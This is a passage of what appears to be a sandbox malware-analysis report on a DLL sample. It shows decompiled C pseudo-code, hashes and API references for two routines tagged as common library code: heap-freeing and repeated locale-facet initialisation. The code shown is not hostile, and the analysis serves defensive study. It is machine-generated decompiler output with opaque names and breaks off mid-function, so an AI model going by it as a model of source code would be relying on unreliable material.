                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 4036118a72cd09b98fd7ab41bcf03e77bdc2c174d201152525f5a170ef0b750f
                          • Instruction ID: d5a374a0051502dc650a2e16d71fb59f373354c9ded5dce8767f4bfa821dc166
                          • Opcode Fuzzy Hash: 4036118a72cd09b98fd7ab41bcf03e77bdc2c174d201152525f5a170ef0b750f
                          • Instruction Fuzzy Hash: 3641B434A0020E9FCF04DFE9D844A9E7BB6BF45329F108565E8149B395D7B1DA42CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25D29B, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E25D29B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6E25CF81(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E6E25CF81(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E6E25CF81(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E6E25CF81(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E6E25CF81(_t5, 2);
					E6E24CBD3( *((intOrPtr*)(_t45 + 0xa0)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0xa4)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E6E25CF81(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E6E25CF81(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E6E25CF81(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E6E25CF81(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E6E25CF81(_t13, 2);
					E6E24CBD3( *((intOrPtr*)(_t45 + 0x154)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0x158)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E24CBD3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}





                          0x6e25d2a1
                          0x6e25d2a6
                          0x6e25d2af
                          0x6e25d2b4
                          0x6e25d2ba
                          0x6e25d2bf
                          0x6e25d2c5
                          0x6e25d2ca
                          0x6e25d2d0
                          0x6e25d2d5
                          0x6e25d2de
                          0x6e25d2e9
                          0x6e25d2f4
                          0x6e25d2ff
                          0x6e25d304
                          0x6e25d30d
                          0x6e25d312
                          0x6e25d31b
                          0x6e25d323
                          0x6e25d32c
                          0x6e25d331
                          0x6e25d33a
                          0x6e25d33f
                          0x6e25d348
                          0x6e25d353
                          0x6e25d35e
                          0x6e25d369
                          0x00000000
                          0x6e25d379
                          0x6e25d37e

                          APIs
                            • Part of subcall function 6E25CF81: _free.LIBCMT ref: 6E25CFAA
                          • _free.LIBCMT ref: 6E25D2E9
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E25D2F4
                          • _free.LIBCMT ref: 6E25D2FF
                          • _free.LIBCMT ref: 6E25D353
                          • _free.LIBCMT ref: 6E25D35E
                          • _free.LIBCMT ref: 6E25D369
                          • _free.LIBCMT ref: 6E25D374
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
                          • Instruction ID: 8fa4785d91d2f5e5975e706f67165941b4479354c1bb5b7543d275e210967cf9
                          • Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
                          • Instruction Fuzzy Hash: 4D118175944B0CFBE520A7F0CD07FCBB7AE9F00B14F508D16E29AAE251EB39B5144650
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20EF91, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20EF91(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t307;
				signed int _t308;
				void* _t320;
				void* _t333;
				void* _t346;
				void* _t359;
				void* _t372;
				void* _t385;
				void* _t398;
				void* _t411;
				void* _t424;
				void* _t437;
				void* _t450;
				void* _t463;
				void* _t476;
				void* _t489;
				void* _t502;
				void* _t515;
				void* _t528;
				void* _t541;
				void* _t554;
				void* _t567;
				signed int _t815;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				void* _t946;

				_t879 = __edx;
				_t668 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t946 - 0x14, 0);
				_t903 =  *0x6e2c6de4; // 0x0
				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
				 *(_t946 - 0x10) = _t903;
				_t307 = E6E1E161C(0x6e2c6d90);
				_t671 =  *((intOrPtr*)(_t946 + 8));
				_t308 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t307);
				_t881 = _t308;
				if(_t308 != 0) {
					L5:
					E6E2066BA(_t946 - 0x14);
					return E6E220075(_t881);
				} else {
					if(_t903 == 0) {
						_push( *((intOrPtr*)(_t946 + 8)));
						_push(_t946 - 0x10);
						__eflags = E6E210D03(__ebx, _t671, __edx, _t881, _t903) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t946 - 0x20);
							E6E223D74(_t946 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t881, _t903, 0x14);
							E6E206653(_t946 - 0x14, 0);
							_t904 =  *0x6e2c6db4; // 0x0
							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
							 *(_t946 - 0x10) = _t904;
							_t320 = E6E1E161C(0x6e2c6d68);
							_t678 =  *((intOrPtr*)(_t946 + 8));
							_t882 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t320);
							__eflags = _t882;
							if(_t882 != 0) {
								L12:
								E6E2066BA(_t946 - 0x14);
								return E6E220075(_t882);
							} else {
								__eflags = _t904;
								if(_t904 == 0) {
									_push( *((intOrPtr*)(_t946 + 8)));
									_push(_t946 - 0x10);
									__eflags = E6E210DA5(_t668, _t678, __edx, _t882, _t904) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t946 - 0x20);
										E6E223D74(_t946 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t668, _t882, _t904, 0x14);
										E6E206653(_t946 - 0x14, 0);
										_t905 =  *0x6e2c6dd4; // 0x0
										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
										 *(_t946 - 0x10) = _t905;
										_t333 = E6E1E161C(0x6e2c6b28);
										_t685 =  *((intOrPtr*)(_t946 + 8));
										_t883 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t333);
										__eflags = _t883;
										if(_t883 != 0) {
											L19:
											E6E2066BA(_t946 - 0x14);
											return E6E220075(_t883);
										} else {
											__eflags = _t905;
											if(_t905 == 0) {
												_push( *((intOrPtr*)(_t946 + 8)));
												_push(_t946 - 0x10);
												__eflags = E6E210E47(_t668, _t685, __edx, _t883, _t905) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t946 - 0x20);
													E6E223D74(_t946 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t668, _t883, _t905, 0x14);
													E6E206653(_t946 - 0x14, 0);
													_t906 =  *0x6e2c6de8; // 0x0
													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
													 *(_t946 - 0x10) = _t906;
													_t346 = E6E1E161C(0x6e2c6d94);
													_t692 =  *((intOrPtr*)(_t946 + 8));
													_t884 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t346);
													__eflags = _t884;
													if(_t884 != 0) {
														L26:
														E6E2066BA(_t946 - 0x14);
														return E6E220075(_t884);
													} else {
														__eflags = _t906;
														if(_t906 == 0) {
															_push( *((intOrPtr*)(_t946 + 8)));
															_push(_t946 - 0x10);
															__eflags = E6E210EB7(_t668, _t692, _t879, _t884, _t906) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t946 - 0x20);
																E6E223D74(_t946 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t668, _t884, _t906, 0x14);
																E6E206653(_t946 - 0x14, 0);
																_t907 =  *0x6e2c6db8; // 0x0
																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																 *(_t946 - 0x10) = _t907;
																_t359 = E6E1E161C(0x6e2c6d6c);
																_t699 =  *((intOrPtr*)(_t946 + 8));
																_t885 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t359);
																__eflags = _t885;
																if(_t885 != 0) {
																	L33:
																	E6E2066BA(_t946 - 0x14);
																	return E6E220075(_t885);
																} else {
																	__eflags = _t907;
																	if(_t907 == 0) {
																		_push( *((intOrPtr*)(_t946 + 8)));
																		_push(_t946 - 0x10);
																		__eflags = E6E210F1F(_t668, _t699, _t879, _t885, _t907) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t946 - 0x20);
																			E6E223D74(_t946 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t668, _t885, _t907, 0x14);
																			E6E206653(_t946 - 0x14, 0);
																			_t908 =  *0x6e2c6dec; // 0x0
																			 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																			 *(_t946 - 0x10) = _t908;
																			_t372 = E6E1E161C(0x6e2c6d98);
																			_t706 =  *((intOrPtr*)(_t946 + 8));
																			_t886 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t372);
																			__eflags = _t886;
																			if(_t886 != 0) {
																				L40:
																				E6E2066BA(_t946 - 0x14);
																				return E6E220075(_t886);
																			} else {
																				__eflags = _t908;
																				if(_t908 == 0) {
																					_push( *((intOrPtr*)(_t946 + 8)));
																					_push(_t946 - 0x10);
																					__eflags = E6E210F87(_t668, _t706, _t879, _t886, _t908) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t946 - 0x20);
																						E6E223D74(_t946 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t668, _t886, _t908, 0x14);
																						E6E206653(_t946 - 0x14, 0);
																						_t909 =  *0x6e2c6dbc; // 0x0
																						 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																						 *(_t946 - 0x10) = _t909;
																						_t385 = E6E1E161C(0x6e2c6d70);
																						_t713 =  *((intOrPtr*)(_t946 + 8));
																						_t887 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t385);
																						__eflags = _t887;
																						if(_t887 != 0) {
																							L47:
																							E6E2066BA(_t946 - 0x14);
																							return E6E220075(_t887);
																						} else {
																							__eflags = _t909;
																							if(_t909 == 0) {
																								_push( *((intOrPtr*)(_t946 + 8)));
																								_push(_t946 - 0x10);
																								__eflags = E6E210FEF(_t668, _t713, _t879, _t887, _t909) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t946 - 0x20);
																									E6E223D74(_t946 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t668, _t887, _t909, 0x14);
																									E6E206653(_t946 - 0x14, 0);
																									_t910 =  *0x6e2c6df0; // 0x0
																									 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																									 *(_t946 - 0x10) = _t910;
																									_t398 = E6E1E161C(0x6e2c6d9c);
																									_t720 =  *((intOrPtr*)(_t946 + 8));
																									_t888 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t398);
																									__eflags = _t888;
																									if(_t888 != 0) {
																										L54:
																										E6E2066BA(_t946 - 0x14);
																										return E6E220075(_t888);
																									} else {
																										__eflags = _t910;
																										if(_t910 == 0) {
																											_push( *((intOrPtr*)(_t946 + 8)));
																											_push(_t946 - 0x10);
																											__eflags = E6E211057(_t668, _t720, _t879, _t888, _t910) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t946 - 0x20);
																												E6E223D74(_t946 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t668, _t888, _t910, 0x14);
																												E6E206653(_t946 - 0x14, 0);
																												_t911 =  *0x6e2c6dc0; // 0x0
																												 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																												 *(_t946 - 0x10) = _t911;
																												_t411 = E6E1E161C(0x6e2c6d74);
																												_t727 =  *((intOrPtr*)(_t946 + 8));
																												_t889 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t411);
																												__eflags = _t889;
																												if(_t889 != 0) {
																													L61:
																													E6E2066BA(_t946 - 0x14);
																													return E6E220075(_t889);
																												} else {
																													__eflags = _t911;
																													if(_t911 == 0) {
																														_push( *((intOrPtr*)(_t946 + 8)));
																														_push(_t946 - 0x10);
																														__eflags = E6E2110BF(_t668, _t727, _t879, _t889, _t911) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t946 - 0x20);
																															E6E223D74(_t946 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t668, _t889, _t911, 0x14);
																															E6E206653(_t946 - 0x14, 0);
																															_t912 =  *0x6e2c6df8; // 0x0
																															 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																															 *(_t946 - 0x10) = _t912;
																															_t424 = E6E1E161C(0x6e2c6da4);
																															_t734 =  *((intOrPtr*)(_t946 + 8));
																															_t890 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t424);
																															__eflags = _t890;
																															if(_t890 != 0) {
																																L68:
																																E6E2066BA(_t946 - 0x14);
																																return E6E220075(_t890);
																															} else {
																																__eflags = _t912;
																																if(_t912 == 0) {
																																	_push( *((intOrPtr*)(_t946 + 8)));
																																	_push(_t946 - 0x10);
																																	__eflags = E6E211127(_t668, _t734, _t879, _t890, _t912) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t946 - 0x20);
																																		E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t668, _t890, _t912, 0x14);
																																		E6E206653(_t946 - 0x14, 0);
																																		_t913 =  *0x6e2c6df4; // 0x0
																																		 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																		 *(_t946 - 0x10) = _t913;
																																		_t437 = E6E1E161C(0x6e2c6da0);
																																		_t741 =  *((intOrPtr*)(_t946 + 8));
																																		_t891 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t437);
																																		__eflags = _t891;
																																		if(_t891 != 0) {
																																			L75:
																																			E6E2066BA(_t946 - 0x14);
																																			return E6E220075(_t891);
																																		} else {
																																			__eflags = _t913;
																																			if(_t913 == 0) {
																																				_push( *((intOrPtr*)(_t946 + 8)));
																																				_push(_t946 - 0x10);
																																				__eflags = E6E2111AB(_t668, _t741, _t879, _t891, _t913) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t946 - 0x20);
																																					E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t668, _t891, _t913, 0x14);
																																					E6E206653(_t946 - 0x14, 0);
																																					_t914 =  *0x6e2c6dc8; // 0x0
																																					 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																					 *(_t946 - 0x10) = _t914;
																																					_t450 = E6E1E161C(0x6e2c6d7c);
																																					_t748 =  *((intOrPtr*)(_t946 + 8));
																																					_t892 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t450);
																																					__eflags = _t892;
																																					if(_t892 != 0) {
																																						L82:
																																						E6E2066BA(_t946 - 0x14);
																																						return E6E220075(_t892);
																																					} else {
																																						__eflags = _t914;
																																						if(_t914 == 0) {
																																							_push( *((intOrPtr*)(_t946 + 8)));
																																							_push(_t946 - 0x10);
																																							__eflags = E6E211230(_t668, _t748, _t879, _t892, _t914) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t946 - 0x20);
																																								E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t668, _t892, _t914, 0x14);
																																								E6E206653(_t946 - 0x14, 0);
																																								_t915 =  *0x6e2c6dc4; // 0x0
																																								 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																								 *(_t946 - 0x10) = _t915;
																																								_t463 = E6E1E161C(0x6e2c6d78);
																																								_t755 =  *((intOrPtr*)(_t946 + 8));
																																								_t893 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t463);
																																								__eflags = _t893;
																																								if(_t893 != 0) {
																																									L89:
																																									E6E2066BA(_t946 - 0x14);
																																									return E6E220075(_t893);
																																								} else {
																																									__eflags = _t915;
																																									if(_t915 == 0) {
																																										_push( *((intOrPtr*)(_t946 + 8)));
																																										_push(_t946 - 0x10);
																																										__eflags = E6E2112B4(_t668, _t755, _t879, _t893, _t915) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t946 - 0x20);
																																											E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t668, _t893, _t915, 0x14);
																																											E6E206653(_t946 - 0x14, 0);
																																											_t916 =  *0x6e2c6dd8; // 0x0
																																											 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																											 *(_t946 - 0x10) = _t916;
																																											_t476 = E6E1E161C(0x6e2c6d84);
																																											_t762 =  *((intOrPtr*)(_t946 + 8));
																																											_t894 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t476);
																																											__eflags = _t894;
																																											if(_t894 != 0) {
																																												L96:
																																												E6E2066BA(_t946 - 0x14);
																																												return E6E220075(_t894);
																																											} else {
																																												__eflags = _t916;
																																												if(_t916 == 0) {
																																													_push( *((intOrPtr*)(_t946 + 8)));
																																													_push(_t946 - 0x10);
																																													__eflags = E6E211339(_t668, _t762, _t879, _t894, _t916) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t946 - 0x20);
																																														E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t668, _t894, _t916, 0x14);
																																														E6E206653(_t946 - 0x14, 0);
																																														_t917 =  *0x6e2c6db0; // 0x0
																																														 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																														 *(_t946 - 0x10) = _t917;
																																														_t489 = E6E1E161C(0x6e2c6d64);
																																														_t769 =  *((intOrPtr*)(_t946 + 8));
																																														_t895 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t489);
																																														__eflags = _t895;
																																														if(_t895 != 0) {
																																															L103:
																																															E6E2066BA(_t946 - 0x14);
																																															return E6E220075(_t895);
																																														} else {
																																															__eflags = _t917;
																																															if(_t917 == 0) {
																																																_push( *((intOrPtr*)(_t946 + 8)));
																																																_push(_t946 - 0x10);
																																																__eflags = E6E2113A1(_t668, _t769, _t879, _t895, _t917) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t946 - 0x20);
																																																	E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t668, _t895, _t917, 0x14);
																																																	E6E206653(_t946 - 0x14, 0);
																																																	_t918 =  *0x6e2c6ddc; // 0x0
																																																	 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																	 *(_t946 - 0x10) = _t918;
																																																	_t502 = E6E1E161C(0x6e2c6d88);
																																																	_t776 =  *((intOrPtr*)(_t946 + 8));
																																																	_t896 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t502);
																																																	__eflags = _t896;
																																																	if(_t896 != 0) {
																																																		L110:
																																																		E6E2066BA(_t946 - 0x14);
																																																		return E6E220075(_t896);
																																																	} else {
																																																		__eflags = _t918;
																																																		if(_t918 == 0) {
																																																			_push( *((intOrPtr*)(_t946 + 8)));
																																																			_push(_t946 - 0x10);
																																																			__eflags = E6E211409(_t668, _t776, _t879, _t896, _t918) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t946 - 0x20);
																																																				E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t668, _t896, _t918, 0x14);
																																																				E6E206653(_t946 - 0x14, 0);
																																																				_t919 =  *0x6e2c6de0; // 0x0
																																																				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																				 *(_t946 - 0x10) = _t919;
																																																				_t515 = E6E1E161C(0x6e2c6d8c);
																																																				_t783 =  *((intOrPtr*)(_t946 + 8));
																																																				_t897 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t515);
																																																				__eflags = _t897;
																																																				if(_t897 != 0) {
																																																					L117:
																																																					E6E2066BA(_t946 - 0x14);
																																																					return E6E220075(_t897);
																																																				} else {
																																																					__eflags = _t919;
																																																					if(_t919 == 0) {
																																																						_push( *((intOrPtr*)(_t946 + 8)));
																																																						_push(_t946 - 0x10);
																																																						__eflags = E6E211471(_t668, _t783, _t879, _t897, _t919) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1E1438(_t946 - 0x20);
																																																							E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e2683cf, _t668, _t897, _t919, 0x14);
																																																							E6E206653(_t946 - 0x14, 0);
																																																							_t920 =  *0x6e2c6dfc; // 0x0
																																																							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																							 *(_t946 - 0x10) = _t920;
																																																							_t528 = E6E1E161C(0x6e2c6da8);
																																																							_t790 =  *((intOrPtr*)(_t946 + 8));
																																																							_t898 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t528);
																																																							__eflags = _t898;
																																																							if(_t898 != 0) {
																																																								L124:
																																																								E6E2066BA(_t946 - 0x14);
																																																								return E6E220075(_t898);
																																																							} else {
																																																								__eflags = _t920;
																																																								if(_t920 == 0) {
																																																									_push( *((intOrPtr*)(_t946 + 8)));
																																																									_push(_t946 - 0x10);
																																																									__eflags = E6E2114EC(_t668, _t790, _t879, _t898, _t920) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1E1438(_t946 - 0x20);
																																																										E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																										asm("int3");
																																																										E6E2200AC(0x6e2683cf, _t668, _t898, _t920, 0x14);
																																																										E6E206653(_t946 - 0x14, 0);
																																																										_t921 =  *0x6e2c6dcc; // 0x0
																																																										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																										 *(_t946 - 0x10) = _t921;
																																																										_t541 = E6E1E161C(0x6e2c6d80);
																																																										_t797 =  *((intOrPtr*)(_t946 + 8));
																																																										_t899 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t541);
																																																										__eflags = _t899;
																																																										if(_t899 != 0) {
																																																											L131:
																																																											E6E2066BA(_t946 - 0x14);
																																																											return E6E220075(_t899);
																																																										} else {
																																																											__eflags = _t921;
																																																											if(_t921 == 0) {
																																																												_push( *((intOrPtr*)(_t946 + 8)));
																																																												_push(_t946 - 0x10);
																																																												__eflags = E6E211558(_t668, _t797, _t879, _t899, _t921) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6E1E1438(_t946 - 0x20);
																																																													E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																													asm("int3");
																																																													E6E2200AC(0x6e2683cf, _t668, _t899, _t921, 0x14);
																																																													E6E206653(_t946 - 0x14, 0);
																																																													_t922 =  *0x6e2c6e00; // 0x0
																																																													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																													 *(_t946 - 0x10) = _t922;
																																																													_t554 = E6E1E161C(0x6e2c6dac);
																																																													_t804 =  *((intOrPtr*)(_t946 + 8));
																																																													_t900 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t554);
																																																													__eflags = _t900;
																																																													if(_t900 != 0) {
																																																														L138:
																																																														E6E2066BA(_t946 - 0x14);
																																																														return E6E220075(_t900);
																																																													} else {
																																																														__eflags = _t922;
																																																														if(_t922 == 0) {
																																																															_push( *((intOrPtr*)(_t946 + 8)));
																																																															_push(_t946 - 0x10);
																																																															__eflags = E6E2115C4(_t668, _t804, _t879, _t900, _t922) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6E1E1438(_t946 - 0x20);
																																																																E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																																asm("int3");
																																																																E6E2200AC(0x6e2683cf, _t668, _t900, _t922, 0x14);
																																																																E6E206653(_t946 - 0x14, 0);
																																																																_t923 =  *0x6e2c6dd0; // 0x0
																																																																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																																 *(_t946 - 0x10) = _t923;
																																																																_t567 = E6E1E161C(0x6e2c6d60);
																																																																_t811 =  *((intOrPtr*)(_t946 + 8));
																																																																_t901 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t567);
																																																																__eflags = _t901;
																																																																if(_t901 != 0) {
																																																																	L145:
																																																																	E6E2066BA(_t946 - 0x14);
																																																																	return E6E220075(_t901);
																																																																} else {
																																																																	__eflags = _t923;
																																																																	if(_t923 == 0) {
																																																																		_push( *((intOrPtr*)(_t946 + 8)));
																																																																		_push(_t946 - 0x10);
																																																																		__eflags = E6E21162A(_t668, _t811, _t879, _t901, _t923) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			_t815 = _t946 - 0x20;
																																																																			E6E1E1438(_t815);
																																																																			E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																																			asm("int3");
																																																																			E6E2200AC(0x6e26851f, _t668, _t901, _t923, 4);
																																																																			_t924 = _t815;
																																																																			 *(_t946 - 0x10) = _t924;
																																																																			 *((intOrPtr*)(_t924 + 4)) =  *((intOrPtr*)(_t946 + 0xc));
																																																																			_push( *((intOrPtr*)(_t946 + 0x14)));
																																																																			_t301 = _t946 - 4;
																																																																			 *_t301 =  *(_t946 - 4) & 0x00000000;
																																																																			__eflags =  *_t301;
																																																																			 *_t924 = 0x6e26c0c4;
																																																																			 *((char*)(_t924 + 0x28)) =  *((intOrPtr*)(_t946 + 0x10));
																																																																			E6E21542F(_t668, _t815, _t879, _t901, _t924,  *_t301);
																																																																			return E6E220075(_t924,  *((intOrPtr*)(_t946 + 8)));
																																																																		} else {
																																																																			_t901 =  *(_t946 - 0x10);
																																																																			 *(_t946 - 0x10) = _t901;
																																																																			 *(_t946 - 4) = 1;
																																																																			E6E206FD3(__eflags, _t901);
																																																																			 *0x6e26a26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t901 + 4))))();
																																																																			 *0x6e2c6dd0 = _t901;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t901 = _t923;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t900 =  *(_t946 - 0x10);
																																																																 *(_t946 - 0x10) = _t900;
																																																																 *(_t946 - 4) = 1;
																																																																E6E206FD3(__eflags, _t900);
																																																																 *0x6e26a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t900 + 4))))();
																																																																 *0x6e2c6e00 = _t900;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t900 = _t922;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t899 =  *(_t946 - 0x10);
																																																													 *(_t946 - 0x10) = _t899;
